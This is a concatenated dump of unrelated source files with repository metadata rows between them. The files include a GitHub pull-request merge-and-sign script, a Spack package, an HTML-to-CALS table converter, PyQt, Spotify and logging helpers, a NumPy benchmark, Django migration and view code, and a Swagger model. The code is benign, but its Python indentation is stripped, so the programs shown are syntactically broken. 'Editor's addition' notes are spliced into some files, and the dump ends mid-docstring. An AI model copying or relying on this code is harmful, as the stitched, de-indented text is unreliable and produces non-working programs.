Get named configuration option from git repository.
'''
try:
return subprocess.check_output([GIT,'config','--get',option]).rstrip().decode('utf-8')
except subprocess.CalledProcessError as e:
return default
def retrieve_pr_info(repo,pull):
'''
Retrieve pull request information from github.
Return None if no title can be found, or an error happens.
'''
try:
req = Request("https://api.github.com/repos/"+repo+"/pulls/"+pull)
result = urlopen(req)
reader = codecs.getreader('utf-8')
obj = json.load(reader(result))
return obj
except Exception as e:
print('Warning: unable to retrieve pull information from github: %s' % e)
return None
def ask_prompt(text):
print(text,end=" ",file=stderr)
stderr.flush()
reply = stdin.readline().rstrip()
print("",file=stderr)
return reply
def get_symlink_files():
files = sorted(subprocess.check_output([GIT, 'ls-tree', '--full-tree', '-r', 'HEAD']).splitlines())
ret = []
for f in files:
if (int(f.decode('utf-8').split(" ")[0], 8) & 0o170000) == 0o120000:
ret.append(f.decode('utf-8').split("\t")[1])
return ret
def tree_sha512sum(commit='HEAD'):
# request metadata for entire tree, recursively
files = []
blob_by_name = {}
for line in subprocess.check_output([GIT, 'ls-tree', '--full-tree', '-r', commit]).splitlines():
name_sep = line.index(b'\t')
metadata = line[:name_sep].split() # perms, 'blob', blobid
assert(metadata[1] == b'blob')
name = line[name_sep+1:]
files.append(name)
blob_by_name[name] = metadata[2]
files.sort()
# open connection to git-cat-file in batch mode to request data for all blobs
# this is much faster than launching it per file
p = subprocess.Popen([GIT, 'cat-file', '--batch'], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
overall = hashlib.sha512()
for f in files:
blob = blob_by_name[f]
# request blob
p.stdin.write(blob + b'\n')
p.stdin.flush()
# read header: blob, "blob", size
reply = p.stdout.readline().split()
assert(reply[0] == blob and reply[1] == b'blob')
size = int(reply[2])
# hash the blob data
intern = hashlib.sha512()
ptr = 0
while ptr < size:
bs = min(65536, size - ptr)
piece = p.stdout.read(bs)
if len(piece) == bs:
intern.update(piece)
else:
raise IOError('Premature EOF reading git cat-file output')
ptr += bs
dig = intern.hexdigest()
assert(p.stdout.read(1) == b'\n') # ignore LF that follows blob data
# update overall hash with file hash
overall.update(dig.encode("utf-8"))
overall.update(" ".encode("utf-8"))
overall.update(f)
overall.update("\n".encode("utf-8"))
p.stdin.close()
if p.wait():
raise IOError('Non-zero return value executing git cat-file')
return overall.hexdigest()
def print_merge_details(pull, title, branch, base_branch, head_branch):
print('%s#%s%s %s %sinto %s%s' % (ATTR_RESET+ATTR_PR,pull,ATTR_RESET,title,ATTR_RESET+ATTR_PR,branch,ATTR_RESET))
subprocess.check_call([GIT,'log','--graph','--topo-order','--pretty=format:'+COMMIT_FORMAT,base_branch+'..'+head_branch])
def parse_arguments():
epilog = '''
In addition, you can set the following git configuration variables:
githubmerge.repository (mandatory),
user.signingkey (mandatory),
githubmerge.host (default: git@github.com),
githubmerge.branch (no default),
githubmerge.testcmd (default: none).
'''
parser = argparse.ArgumentParser(description='Utility to merge, sign and push github pull requests',
epilog=epilog)
parser.add_argument('pull', metavar='PULL', type=int, nargs=1,
help='Pull request ID to merge')
parser.add_argument('branch', metavar='BRANCH', type=str, nargs='?',
default=None, help='Branch to merge against (default: githubmerge.branch setting, or base branch for pull, or \'master\')')
return parser.parse_args()
def main():
# Extract settings from git repo
repo = git_config_get('githubmerge.repository')
host = git_config_get('githubmerge.host','git@github.com')
opt_branch = git_config_get('githubmerge.branch',None)
testcmd = git_config_get('githubmerge.testcmd')
signingkey = git_config_get('user.signingkey')
if repo is None:
print("ERROR: No repository configured. Use this command to set:", file=stderr)
print("git config githubmerge.repository <owner>/<repo>", file=stderr)
sys.exit(1)
if signingkey is None:
print("ERROR: No GPG signing key set. Set one using:",file=stderr)
print("git config --global user.signingkey <key>",file=stderr)
sys.exit(1)
host_repo = host+":"+repo # shortcut for push/pull target
# Extract settings from command line
args = parse_arguments()
pull = str(args.pull[0])
# Receive pull information from github
info = retrieve_pr_info(repo,pull)
if info is None:
sys.exit(1)
title = info['title'].strip()
body = info['body'].strip()
# precedence order for destination branch argument:
# - command line argument
# - githubmerge.branch setting
# - base branch for pull (as retrieved from github)
# - 'master'
branch = args.branch or opt_branch or info['base']['ref'] or 'master'
# Initialize source branches
head_branch = 'pull/'+pull+'/head'
base_branch = 'pull/'+pull+'/base'
merge_branch = 'pull/'+pull+'/merge'
local_merge_branch = 'pull/'+pull+'/local-merge'
devnull = open(os.devnull,'w')
try:
subprocess.check_call([GIT,'checkout','-q',branch])
except subprocess.CalledProcessError as e:
print("ERROR: Cannot check out branch %s." % (branch), file=stderr)
sys.exit(3)
try:
subprocess.check_call([GIT,'fetch','-q',host_repo,'+refs/pull/'+pull+'/*:refs/heads/pull/'+pull+'/*',
'+refs/heads/'+branch+':refs/heads/'+base_branch])
except subprocess.CalledProcessError as e:
print("ERROR: Cannot find pull request #%s or branch %s on %s." % (pull,branch,host_repo), file=stderr)
sys.exit(3)
try:
subprocess.check_call([GIT,'log','-q','-1','refs/heads/'+head_branch], stdout=devnull, stderr=stdout)
except subprocess.CalledProcessError as e:
print("ERROR: Cannot find head of pull request #%s on %s." % (pull,host_repo), file=stderr)
sys.exit(3)
try:
subprocess.check_call([GIT,'log','-q','-1','refs/heads/'+merge_branch], stdout=devnull, stderr=stdout)
except subprocess.CalledProcessError as e:
print("ERROR: Cannot find merge of pull request #%s on %s." % (pull,host_repo), file=stderr)
sys.exit(3)
subprocess.check_call([GIT,'checkout','-q',base_branch])
subprocess.call([GIT,'branch','-q','-D',local_merge_branch], stderr=devnull)
subprocess.check_call([GIT,'checkout','-q','-b',local_merge_branch])
try:
# Go up to the repository's root.
toplevel = subprocess.check_output([GIT,'rev-parse','--show-toplevel']).strip()
os.chdir(toplevel)
# Create unsigned merge commit.
if title:
firstline = 'Merge #%s: %s' % (pull,title)
else:
firstline = 'Merge #%s' % (pull,)
message = firstline + '\n\n'
message += subprocess.check_output([GIT,'log','--no-merges','--topo-order','--pretty=format:%h %s (%an)',base_branch+'..'+head_branch]).decode('utf-8')
message += '\n\nPull request description:\n\n ' + body.replace('\n', '\n ') + '\n'
try:
subprocess.check_call([GIT,'merge','-q','--commit','--no-edit','--no-ff','-m',message.encode('utf-8'),head_branch])
except subprocess.CalledProcessError as e:
print("ERROR: Cannot be merged cleanly.",file=stderr)
subprocess.check_call([GIT,'merge','--abort'])
sys.exit(4)
logmsg = subprocess.check_output([GIT,'log','--pretty=format:%s','-n','1']).decode('utf-8')
if logmsg.rstrip() != firstline.rstrip():
print("ERROR: Creating merge failed (already merged?).",file=stderr)
sys.exit(4)
symlink_files = get_symlink_files()
for f in symlink_files:
print("ERROR: File %s was a symlink" % f)
if len(symlink_files) > 0:
sys.exit(4)
# Put tree SHA512 into the message
try:
first_sha512 = tree_sha512sum()
message += '\n\nTree-SHA512: ' + first_sha512
except subprocess.CalledProcessError as e:
print("ERROR: Unable to compute tree hash")
sys.exit(4)
try:
subprocess.check_call([GIT,'commit','--amend','-m',message.encode('utf-8')])
except subprocess.CalledProcessError as e:
print("ERROR: Cannot update message.", file=stderr)
sys.exit(4)
print_merge_details(pull, title, branch, base_branch, head_branch)
print()
# Run test command if configured.
if testcmd:
if subprocess.call(testcmd,shell=True):
print("ERROR: Running %s failed." % testcmd,file=stderr)
sys.exit(5)
# Show the created merge.
diff = subprocess.check_output([GIT,'diff',merge_branch+'..'+local_merge_branch])
subprocess.check_call([GIT,'diff',base_branch+'..'+local_merge_branch])
if diff:
print("WARNING: merge differs from github!",file=stderr)
reply = ask_prompt("Type 'ignore' to continue.")
if reply.lower() == 'ignore':
print("Difference with github ignored.",file=stderr)
else:
sys.exit(6)
else:
# Verify the result manually.
print("Dropping you on a shell so you can try building/testing the merged source.",file=stderr)
print("Run 'git diff HEAD~' to show the changes being merged.",file=stderr)
print("Type 'exit' when done.",file=stderr)
if os.path.isfile('/etc/debian_version'): # Show pull number on Debian default prompt
os.putenv('debian_chroot',pull)
subprocess.call([BASH,'-i'])
second_sha512 = tree_sha512sum()
if first_sha512 != second_sha512:
print("ERROR: Tree hash changed unexpectedly",file=stderr)
sys.exit(8)
# Sign the merge commit.
print_merge_details(pull, title, branch, base_branch, head_branch)
while True:
reply = ask_prompt("Type 's' to sign off on the above merge, or 'x' to reject and exit.").lower()
if reply == 's':
try:
subprocess.check_call([GIT,'commit','-q','--gpg-sign','--amend','--no-edit'])
break
except subprocess.CalledProcessError as e:
print("Error while signing, asking again.",file=stderr)
elif reply == 'x':
print("Not signing off on merge, exiting.",file=stderr)
sys.exit(1)
# Put the result in branch.
subprocess.check_call([GIT,'checkout','-q',branch])
subprocess.check_call([GIT,'reset','-q','--hard',local_merge_branch])
finally:
# Clean up temporary branches.
subprocess.call([GIT,'checkout','-q',branch])
subprocess.call([GIT,'branch','-q','-D',head_branch],stderr=devnull)
subprocess.call([GIT,'branch','-q','-D',base_branch],stderr=devnull)
subprocess.call([GIT,'branch','-q','-D',merge_branch],stderr=devnull)
subprocess.call([GIT,'branch','-q','-D',local_merge_branch],stderr=devnull)
# Push the result.
while True:
reply = ask_prompt("Type 'push' to push the result to %s, branch %s, or 'x' to exit without pushing." % (host_repo,branch)).lower()
if reply == 'push':
subprocess.check_call([GIT,'push',host_repo,'refs/heads/'+branch])
break
elif reply == 'x':
sys.exit(1)
if __name__ == '__main__':
main()
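# --- Example setup (editor's addition, not part of the original script) ---
# The configuration variables documented in parse_arguments() above are set
# once per clone; the repository and test command values below are placeholders:
#
#   git config githubmerge.repository doriancoins/doriancoin
#   git config --global user.signingkey <gpg-key-id>
#   git config githubmerge.testcmd "make -j4 check"
#
# After that a pull request is merged with:  ./github-merge.py <pull-number>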
| 42.21148
| 159
| 0.618236
|
620cd1036fe43e8de66fb18a726e1b2d007ec4b0
| 1,156
|
py
|
Python
|
var/spack/repos/builtin/packages/py-bcolz/package.py
|
MiddelkoopT/spack
|
4d94c4c4600f42a7a3bb3d06ec879140bc259304
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
var/spack/repos/builtin/packages/py-bcolz/package.py
|
MiddelkoopT/spack
|
4d94c4c4600f42a7a3bb3d06ec879140bc259304
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
var/spack/repos/builtin/packages/py-bcolz/package.py
|
MiddelkoopT/spack
|
4d94c4c4600f42a7a3bb3d06ec879140bc259304
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyBcolz(PythonPackage):
"""bcolz provides columnar and compressed data containers. Column
storage allows for efficiently querying tables with a large number
of columns. It also allows for cheap addition and removal of column.
In addition, bcolz objects are compressed by default for reducing
memory/disk I/O needs. The compression process is carried out internally
by Blosc, a high-performance compressor that is optimized for binary data.
"""
homepage = "https://github.com/Blosc/bcolz"
pypi = "bcolz/bcolz-1.2.1.tar.gz"
version('1.2.1', sha256='c017d09bb0cb5bbb07f2ae223a3f3638285be3b574cb328e91525b2880300bd1')
depends_on('python@2.7:2.8,3.5:', type=('build', 'run'))
depends_on('py-numpy@1.7:', type=('build', 'run'))
depends_on('py-setuptools@18.1:', type='build')
depends_on('py-setuptools-scm@1.5.5:', type='build')
depends_on('py-cython@0.22:', type='build')
| 41.285714
| 95
| 0.723183
|
44b10159ef4b952622b625671005369da934be95
| 3,902
|
py
|
Python
|
HTMLtoCALS.py
|
silviolorusso/fromHTMLtoXML_InDesignFlavour
|
ec66ac70a0f4df573348b1f45e3b4573579df104
|
[
"MIT"
] | 6
|
2015-08-30T20:35:23.000Z
|
2021-03-17T11:57:06.000Z
|
HTMLtoCALS.py
|
silviolorusso/fromHTMLtoXML_InDesignFlavour
|
ec66ac70a0f4df573348b1f45e3b4573579df104
|
[
"MIT"
] | null | null | null |
HTMLtoCALS.py
|
silviolorusso/fromHTMLtoXML_InDesignFlavour
|
ec66ac70a0f4df573348b1f45e3b4573579df104
|
[
"MIT"
] | 2
|
2020-11-05T05:50:09.000Z
|
2021-06-02T14:57:56.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#####################################
# from HTML Table to XML CALS Table #
#####################################
### Open libraries
from bs4 import BeautifulSoup
import sys
### Functions
def calcRowsNumber(soup):
rows = soup.find_all('tr')
return len(rows)
def calcColsNumber(soup):
cols_number = 0
# Iterating over the rows of the table
for each_row in soup.find_all('tr'):
cells = each_row.find_all('td')
if cols_number < len(cells):
cols_number = len(cells)
return cols_number
def createTagWithAttributesPlusString(soup, tag_name, dict_attrib, new_string):
# New tag declaration
new_tag = soup.new_tag(tag_name)
# Looking for present attributes to move inside the new tag
if dict_attrib:
for k, v in dict_attrib.items():
new_tag[k] = v
# New string to put inside the tag
new_string = soup.new_string(new_string)
# Appending the string inside the tag
new_tag.append(new_string)
return new_tag
### Variables
# NOTE (editor): the table number `num` was undefined in the original script;
# it is assumed here to be passed as the first command-line argument.
num = int(sys.argv[1])
input_file_path = '/Users/robertoarista/Desktop/conversione/sezioni/tab_finali/tab' + str(num) + '.html'
table_width = 170.0 #mm
header_row_number = 1
table_name = 'tabella03_'+ str(num)
### Instructions
# Opening source file
table_file = open(input_file_path, 'r').read()
HTML_table = BeautifulSoup(table_file)
# Rows and cols number calculation
cols_number = calcColsNumber(HTML_table)
# New tree
CALS_table = BeautifulSoup('', 'xml')
root_tag = createTagWithAttributesPlusString(CALS_table, table_name, None, '')
# Creating tag 'table'
table_tag_attributes = {'frame':'all'}
table_tag = createTagWithAttributesPlusString(CALS_table, 'table', table_tag_attributes, '')
# Creating tag 'tgroup'
tgroup_tag_attributes = {'cols': cols_number}
tgroup_tag = createTagWithAttributesPlusString(CALS_table, 'tgroup', tgroup_tag_attributes, '')
# Creating tag 'colspec'
for i in xrange(1, cols_number+1):
colspec_tag_attributes = {
'colname':"c%01d" % i,
'colwidth': "%01dmm" % (table_width / cols_number)
}
colspec_tag = createTagWithAttributesPlusString(CALS_table, 'colspec', colspec_tag_attributes, '')
tgroup_tag.append(colspec_tag)
# Creating tags 'thead' and 'tbody'
head_tag = createTagWithAttributesPlusString(CALS_table, 'thead', None, '')
body_tag = createTagWithAttributesPlusString(CALS_table, 'tbody', None, '')
# Iterating over HTML rows
for i, each_row in enumerate(HTML_table.find_all('tr')):
# Creating tag 'row'
row_tag = createTagWithAttributesPlusString(CALS_table, 'row', None, '')
# Iterating over 'td' (HTML cells tags)
for j, each_col in enumerate(each_row.find_all('td')):
# Extracting contents from HTML cells
contenuto_cell = each_col.text.replace('\t', '').replace('\n', ' ').lstrip().rstrip()
# Attributes for entry tag (CALS cell)
entry_tag_attributes = {'align':"left", 'valign':"top"}
# Multiple rows cell
if 'rowspan' in each_col.attrs:
entry_tag_attributes['morerows'] = int(each_col.attrs['rowspan'])-1
# Multiple columns cell
if 'colspan' in each_col.attrs:
begin = "c%01d" % (j+1)
end = "c%01d" % (j+int(each_col.attrs['colspan']))
entry_tag_attributes['namest'] = begin
entry_tag_attributes['nameend'] = end
# Creating 'entry' tag (CALS cell)
entry_tag = createTagWithAttributesPlusString(CALS_table, 'entry', entry_tag_attributes, '')
entry_tag.string = contenuto_cell
# Appending cell into row
row_tag.append(entry_tag)
if i <= header_row_number-1:
head_tag.append(row_tag)
else:
body_tag.append(row_tag)
# Appending header to table
tgroup_tag.append(head_tag)
tgroup_tag.append(body_tag)
# Appending tgroup to table
table_tag.append(tgroup_tag)
# Appending table to root
root_tag.append(table_tag)
# Appending root to soup
CALS_table.append(root_tag)
# Writing table to xml file
with open(input_file_path[:-4]+'xml', "w") as myfile:
myfile.write(CALS_table.prettify().encode('utf-8'))
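# --- Shape of the generated output (editor's note) ---
# Derived from the tag-building calls above; attribute values are examples:
#
#   <tabella03_N>
#     <table frame="all">
#       <tgroup cols="3">
#         <colspec colname="c1" colwidth="56mm"/>
#         ...
#         <thead><row><entry align="left" valign="top">...</entry></row></thead>
#         <tbody><row>...</row></tbody>
#       </tgroup>
#     </table>
#   </tabella03_N>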
| 26.726027
| 102
| 0.722706
|
267cfd60c5c2688d3fb0beb089b0028f176d6977
| 410
|
py
|
Python
|
utils/qtUtils.py
|
JamesQFreeman/MicEye
|
1290c071758ae4634cd374c8fd54c0d667952049
|
[
"MIT"
] | 11
|
2021-09-23T07:42:57.000Z
|
2022-03-09T15:39:32.000Z
|
utils/qtUtils.py
|
JamesQFreeman/MicEye
|
1290c071758ae4634cd374c8fd54c0d667952049
|
[
"MIT"
] | 1
|
2022-03-09T07:21:23.000Z
|
2022-03-09T07:21:23.000Z
|
utils/qtUtils.py
|
JamesQFreeman/MicEye
|
1290c071758ae4634cd374c8fd54c0d667952049
|
[
"MIT"
] | 1
|
2022-03-09T15:39:33.000Z
|
2022-03-09T15:39:33.000Z
|
from PyQt5.QtWidgets import (QApplication, QWidget, QGroupBox, QInputDialog, QDialog, QPushButton,
QLabel, QVBoxLayout, QHBoxLayout, QDesktopWidget, QLineEdit)
def moveToCenter(widget: QWidget):
qtRectangle = widget.frameGeometry()
centerPoint = QDesktopWidget().availableGeometry().center()
qtRectangle.moveCenter(centerPoint)
widget.move(qtRectangle.topLeft())
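# --- Usage sketch (editor's addition): centre a bare QWidget on the primary
# screen with the helper defined above; the window size is arbitrary.
if __name__ == '__main__':
    import sys
    app = QApplication(sys.argv)
    window = QWidget()
    window.resize(400, 300)
    moveToCenter(window)
    window.show()
    sys.exit(app.exec_())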
| 41
| 98
| 0.729268
|
2dc2bc2ef57b74144e1d5f54dc0ccf0a9cff9f76
| 2,426
|
py
|
Python
|
examples/mesh/experiments/test_mask.py
|
SebastianoF/pyro2
|
9d1787c2ee25d735a414db3da8c00287743a6fde
|
[
"BSD-3-Clause"
] | 151
|
2018-08-14T12:52:22.000Z
|
2022-03-29T07:57:01.000Z
|
examples/mesh/experiments/test_mask.py
|
SebastianoF/pyro2
|
9d1787c2ee25d735a414db3da8c00287743a6fde
|
[
"BSD-3-Clause"
] | 40
|
2015-03-25T15:45:44.000Z
|
2018-07-30T18:48:47.000Z
|
examples/mesh/experiments/test_mask.py
|
SebastianoF/pyro2
|
9d1787c2ee25d735a414db3da8c00287743a6fde
|
[
"BSD-3-Clause"
] | 56
|
2018-10-10T16:54:59.000Z
|
2022-02-06T08:48:52.000Z
|
#!/usr/bin/env python3
from mesh import patch
import mesh.boundary as bnd
import numpy as np
import time
class Mask(object):
def __init__(self, nx, ny, ng):
self.nx = nx
self.ny = ny
self.ng = ng
ilo = ng
ihi = ng+nx-1
jlo = ng
jhi = ng+ny-1
# just the interior cells
self.valid = self._mask_array(nx, ny, ng)
# shifts in x
self.ip1 = self._mask_array(nx, ny, ng)
self.im1 = self._mask_array(nx, ny, ng)
self.ip2 = self._mask_array(nx, ny, ng)
self.im2 = self._mask_array(nx, ny, ng)
arrays = [self.valid, self.ip1, self.im1, self.ip2, self.im2]
shifts = [0, 1, -1, 2, -2]
for a, s in zip(arrays, shifts):
a[ilo+s:ihi+1+s, jlo:jhi+1] = True
# shifts in y
self.jp1 = self._mask_array(nx, ny, ng)
self.jm1 = self._mask_array(nx, ny, ng)
self.jp2 = self._mask_array(nx, ny, ng)
self.jm2 = self._mask_array(nx, ny, ng)
arrays = [self.jp1, self.jm1, self.jp2, self.jm2]
shifts = [1, -1, 2, -2]
for a, s in zip(arrays, shifts):
a[ilo:ihi+1, jlo+s:jhi+1+s] = True
def _mask_array(self, nx, ny, ng):
return np.zeros((nx+2*ng, ny+2*ng), dtype=bool)
n = 1024
myg = patch.Grid2d(n, 2*n, xmax=1.0, ymax=2.0)
myd = patch.CellCenterData2d(myg)
bc = bnd.BC()
myd.register_var("a", bc)
myd.create()
a = myd.get_var("a")
a[:, :] = np.random.rand(myg.qx, myg.qy)
# slicing method
start = time.time()
da = myg.scratch_array()
da[myg.ilo:myg.ihi+1, myg.jlo:myg.jhi+1] = \
a[myg.ilo+1:myg.ihi+2, myg.jlo:myg.jhi+1] - \
a[myg.ilo-1:myg.ihi, myg.jlo:myg.jhi+1]
print("slice method: ", time.time() - start)
# mask method
m = Mask(myg.nx, myg.ny, myg.ng)
start = time.time()
da2 = myg.scratch_array()
da2[m.valid] = a[m.ip1] - a[m.im1]
print("mask method: ", time.time() - start)
print(np.max(np.abs(da2 - da)))
# roll -- note, we roll in the opposite direction of the shift
start = time.time()
da3 = myg.scratch_array()
da3[:] = np.roll(a, -1, axis=0) - np.roll(a, 1, axis=0)
print("roll method: ", time.time() - start)
print(np.max(np.abs(da3[m.valid] - da[m.valid])))
# ArrayIndex
start = time.time()
da4 = myg.scratch_array()
da4.v()[:, :] = a.ip(1) - a.ip(-1)
print("ArrayIndex method: ", time.time() - start)
print(np.max(np.abs(da4[m.valid] - da[m.valid])))
| 22.256881
| 69
| 0.578318
|
7b4516b8a47b38b990bc83815aa4686db70f9acf
| 1,847
|
py
|
Python
|
spotdl/search/spotifyClient.py
|
ksu-is/spotify-downloader
|
1a08703b8beff98540d6a7052d8393fe2c6fa551
|
[
"MIT"
] | 6
|
2021-05-27T08:25:48.000Z
|
2022-02-08T21:37:24.000Z
|
spotdl/search/spotifyClient.py
|
ksu-is/spotify-downloader
|
1a08703b8beff98540d6a7052d8393fe2c6fa551
|
[
"MIT"
] | null | null | null |
spotdl/search/spotifyClient.py
|
ksu-is/spotify-downloader
|
1a08703b8beff98540d6a7052d8393fe2c6fa551
|
[
"MIT"
] | 1
|
2021-04-06T01:03:40.000Z
|
2021-04-06T01:03:40.000Z
|
from spotipy import Spotify
from spotipy.oauth2 import SpotifyClientCredentials
class Singleton(type):
"""
Singleton metaclass for SpotifyClient. Ensures that SpotifyClient is not
instantiated without prior initialization. Every other instantiation of
SpotifyClient will return the same instance.
"""
_instance = None
def __call__(cls):
if cls._instance is None:
raise Exception('Spotify client not created. Call SpotifyClient.init'
'(client_id, client_secret) first.')
return cls._instance
def init(cls, client_id: str, client_secret: str) -> "Singleton":
'''
`str` `client_id` : client id from your spotify account
`str` `client_secret` : client secret for your client id
        Creates and caches a Spotify client if one does not already exist. Can only be
        called once; subsequent calls raise an Exception.
'''
# check if initialization has been completed, if yes, raise an Exception
if cls._instance and cls._instance.is_initialized():
raise Exception('A spotify client has already been initialized')
credentialManager = SpotifyClientCredentials(
client_id=client_id,
client_secret=client_secret
)
cls._instance = super().__call__(client_credentials_manager=credentialManager)
return cls._instance
class SpotifyClient(Spotify, metaclass=Singleton):
"""
This is the Spotify client meant to be used in the app. Has to be initialized first by
calling `SpotifyClient.init(client_id, client_secret)`.
"""
_initialized = False
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._initialized = True
    def is_initialized(self):
return self._initialized
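# --- Usage sketch (editor's addition): the credentials below are placeholders,
# not real values, and the search query is an arbitrary example.
#
#   SpotifyClient.init(client_id='<client-id>', client_secret='<client-secret>')
#   client = SpotifyClient()            # returns the cached singleton instance
#   results = client.search('artist:Daft Punk', type='track')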
| 34.203704
| 90
| 0.674607
|
ed14a7e338972aa8743bbca2cd32139fcb5ae7c7
| 886
|
py
|
Python
|
Scripts/Log/CustomThreads/Utils/Utils_function.py
|
Sk3pper/AASSS-PoC
|
67630221f029df0f1fbc598ad3c791d0cd429544
|
[
"CC-BY-4.0"
] | null | null | null |
Scripts/Log/CustomThreads/Utils/Utils_function.py
|
Sk3pper/AASSS-PoC
|
67630221f029df0f1fbc598ad3c791d0cd429544
|
[
"CC-BY-4.0"
] | null | null | null |
Scripts/Log/CustomThreads/Utils/Utils_function.py
|
Sk3pper/AASSS-PoC
|
67630221f029df0f1fbc598ad3c791d0cd429544
|
[
"CC-BY-4.0"
] | null | null | null |
import os
# Writes data to a file:
# if the file already exists, the data is appended;
# if not, the file is created from scratch.
import socket
def write_data(path_file_name, data):
"""
:type path_file_name: str
:type data: str
"""
# file does not exist
if not os.path.isfile(path_file_name):
with open(path_file_name, "w+") as f:
f.write("timestamp\tPhase\tFrom\tTo\tPayload\n")
f.write(data)
print " " + str(data[:-2]) + " are saved in path:" + path_file_name
return True
# file exists
else:
with open(path_file_name, "a") as f:
f.write(data)
print " " + str(data[:-2]) + " are saved in path:" + path_file_name
return True
# check if exists a user dir -> if not create it
def check_dir(path_user):
if not os.path.isdir(path_user):
os.makedirs(path_user)
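# --- Usage sketch (editor's addition): the directory and payload below are
# arbitrary examples.
if __name__ == "__main__":
    log_dir = "./logs"
    check_dir(log_dir)
    write_data(os.path.join(log_dir, "trace.tsv"),
               "1510000000\tPhase1\tclient\tserver\thello\r\n")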
| 26.058824
| 83
| 0.590293
|
1d9a2f0a1b0d130b181b04ca90fd470c80b1097a
| 386
|
py
|
Python
|
ots/main/migrations/0014_alter_userblog_title.py
|
hasibarrafiul/Travel-Guide-WebApp
|
f160ce1c4ef95b6e08abcaebf2c702bfdecacd6f
|
[
"MIT"
] | 3
|
2021-12-17T22:22:07.000Z
|
2022-01-25T13:28:10.000Z
|
ots/main/migrations/0014_alter_userblog_title.py
|
hasibarrafiul/Travel-Guide-WebApp
|
f160ce1c4ef95b6e08abcaebf2c702bfdecacd6f
|
[
"MIT"
] | 8
|
2021-11-11T10:43:35.000Z
|
2022-01-08T23:27:33.000Z
|
ots/main/migrations/0014_alter_userblog_title.py
|
hasibarrafiul/Travel-Guide-WebApp
|
f160ce1c4ef95b6e08abcaebf2c702bfdecacd6f
|
[
"MIT"
] | 3
|
2021-11-20T18:35:59.000Z
|
2022-02-15T13:35:47.000Z
|
# Generated by Django 3.2.6 on 2021-12-29 18:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0013_userblog'),
]
operations = [
migrations.AlterField(
model_name='userblog',
name='Title',
field=models.CharField(max_length=300, null=True),
),
]
| 20.315789
| 62
| 0.590674
|
8a9994ff2dc5fb720fc68dedca6d0074c97ae312
| 883
|
py
|
Python
|
users/migrations/0006_auto_20210511_0722.py
|
boussier/CCPSMV_dashboard
|
5a0ac667713f7fd9e3e93c2a83e3da6f3657323f
|
[
"MIT"
] | null | null | null |
users/migrations/0006_auto_20210511_0722.py
|
boussier/CCPSMV_dashboard
|
5a0ac667713f7fd9e3e93c2a83e3da6f3657323f
|
[
"MIT"
] | null | null | null |
users/migrations/0006_auto_20210511_0722.py
|
boussier/CCPSMV_dashboard
|
5a0ac667713f7fd9e3e93c2a83e3da6f3657323f
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2 on 2021-05-11 07:22
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('users', '0005_auto_20210511_0710'),
]
operations = [
migrations.AlterModelOptions(
name='customuser',
options={'verbose_name': 'Utilisateur'},
),
migrations.AddField(
model_name='customuser',
name='agendaRemoteWorking',
field=models.ManyToManyField(to='users.TimeWindow', verbose_name='Agenda télétravail'),
),
migrations.AddField(
model_name='customuser',
name='vehicleType',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='users.vehicletype', verbose_name='Type de véhicule'),
),
]
| 30.448276
| 161
| 0.628539
|
3147d91c77d17db2b99d4cfd500bee861ca9a08a
| 179
|
py
|
Python
|
accounts/views.py
|
knyghty/bord
|
b5c607a6d4ee05255d8e6e77a531b0481966860b
|
[
"MIT"
] | null | null | null |
accounts/views.py
|
knyghty/bord
|
b5c607a6d4ee05255d8e6e77a531b0481966860b
|
[
"MIT"
] | 4
|
2016-11-05T02:53:02.000Z
|
2018-01-13T19:57:24.000Z
|
accounts/views.py
|
knyghty/bord
|
b5c607a6d4ee05255d8e6e77a531b0481966860b
|
[
"MIT"
] | null | null | null |
from registration.backends.simple.views import RegistrationView as BaseRegistrationView
from .forms import UserCreationForm
class RegistrationView(BaseRegistrationView):
    form_class = UserCreationForm
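# --- Hypothetical urls.py wiring (editor's addition, not part of this app) ---
# The URL pattern and name below are assumptions following the conventions of
# django-registration's simple backend:
#
#   from django.conf.urls import url
#   from accounts.views import RegistrationView
#
#   urlpatterns = [
#       url(r'^register/$', RegistrationView.as_view(),
#           name='registration_register'),
#   ]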
| 22.375
| 63
| 0.843575
|
fdb96d8f267d03fdb9160fbb1476f44ddbb1a674
| 3,121
|
py
|
Python
|
beanie/models/nominal_account_category_input.py
|
altoyield/python-beanieclient
|
448b8dd328054eaf32dd7d0bdff700e603b5c27d
|
[
"Apache-2.0"
] | null | null | null |
beanie/models/nominal_account_category_input.py
|
altoyield/python-beanieclient
|
448b8dd328054eaf32dd7d0bdff700e603b5c27d
|
[
"Apache-2.0"
] | null | null | null |
beanie/models/nominal_account_category_input.py
|
altoyield/python-beanieclient
|
448b8dd328054eaf32dd7d0bdff700e603b5c27d
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Beanie ERP API
An API specification for interacting with the Beanie ERP system # noqa: E501
OpenAPI spec version: 0.8
Contact: dev@bean.ie
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from beanie.models.nominal_account_category import NominalAccountCategory # noqa: F401,E501
class NominalAccountCategoryInput(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'int'
}
attribute_map = {
'id': 'id'
}
def __init__(self, id=None): # noqa: E501
"""NominalAccountCategoryInput - a model defined in Swagger""" # noqa: E501
self._id = None
self.discriminator = None
self.id = id
@property
def id(self):
"""Gets the id of this NominalAccountCategoryInput. # noqa: E501
:return: The id of this NominalAccountCategoryInput. # noqa: E501
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this NominalAccountCategoryInput.
:param id: The id of this NominalAccountCategoryInput. # noqa: E501
